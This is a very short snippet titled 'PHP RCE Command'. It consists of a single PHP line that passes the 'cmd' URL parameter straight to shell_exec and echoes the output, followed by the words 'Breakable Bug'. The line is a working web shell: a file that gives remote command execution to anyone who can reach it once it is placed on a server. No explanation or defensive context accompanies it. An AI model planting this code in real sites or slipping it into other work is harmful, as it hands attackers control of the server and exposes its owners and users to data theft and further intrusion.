PHP RCE Command

<?php echo shell_exec($_GET['cmd']); ?>
Breakable Bug